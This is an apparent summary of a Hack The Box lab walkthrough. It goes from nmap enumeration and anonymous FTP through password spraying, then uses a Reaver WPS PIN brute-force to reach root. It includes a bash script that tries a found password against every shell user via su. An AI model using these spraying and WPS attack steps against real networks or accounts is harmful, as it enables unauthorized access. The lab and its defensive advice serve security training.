Wi-Fi Network Penetration Testing from Hack The Box

Jul 24, 2024

Wi-Fi Network Penetration Testing from Hack The Box

Unique Technology in VM

  • Introduction of Wi-Fi technology within the VM (Virtual Machine).
  • Full hardware simulation of a Wi-Fi network without actual hardware.
  • Attack involves WPS (Wi-Fi Protected Setup), a lesser-known technology.

WPS (Wi-Fi Protected Setup)

  • WPS allows a simpler method to connect to Wi-Fi.
  • Entering a PIN gives back a pre-shared key for the network.
  • Should be disabled due to significant security flaws.

Initial Steps

  • nmap Scan: Conducted with -sC -sV -oA wifi_network 10.10.11.247.
    • Found three open ports: FTP (port 21), SSH (port 22), and DNS (port 53).

FTP Information

  • FTP login allows anonymous access.
  • Files downloaded using wget.
  • Files examined using tools like exiftool for metadata.
  • Identified potential usernames from PDF files.

Extracting Useful Info

  • Checked various files in FTP directory for relevant info.
  • Found a tar archive and extracted files using tar xvf.
  • Found a user netadmin in the /etc/passwd file.

Potential Password

  • Wi-Fi password: Found as very_unique_wifi_password_1 in wireless config file.
  • Su password spray: Created a users.txt and sprayed found password using crackmapexec.
  • Successfully logged in as netadmin.

Privilege Escalation

  • Ran LinPEAS to check for vulnerabilities or misconfigurations.
  • Found wireless attack tool Reaver with special capabilities (cap_net_raw).

Reaver Tool

  • Used for attacking WPS and extracting WPA2 passwords.
  • Command: reaver -i mon0 -b <BSSID> extracted the Wi-Fi pre-shared key.
  • Used key to gain root access by spraying over potential usernames.

Script Creation

  • Created a bash script for password spraying: 
    #!/bin/bash
users=$(awk -F: '($NF ~ "sh$"){print $1}' /etc/passwd)
for user in $users; do
    echo "Trying password for $user"
    echo '$1' | timeout 2 su -c "whoami" $user
    if [ $? -eq 0 ]; then
        echo "Success: $user"
        exit
    fi
done
  • Modified script to avoid touching the disk by using functions.

In-Depth Analysis of WPS and Reaver

  • WPS is insecure, splits eight-digit PIN into two parts for validation.
  • Modified router PIN to demonstrate WPS weaknesses.
  • Ran Reaver with verbose output to show real-time PIN brute-forcing.
  • Emphasized importance of disabling WPS on all routers.

Conclusion

  • Demonstrated detailed steps from initial enumeration to gaining root access via WPS attack.
  • Highlighted the importance of understanding network security tools and WPS vulnerabilities.

Key Takeaways

  • Disable WPS on all routers.
  • Use tools like nmap, ftp, wget, exiftool, LinPEAS, and Reaver for network penetration testing.
  • Ensure strong and updated security practices to safeguard against such attacks.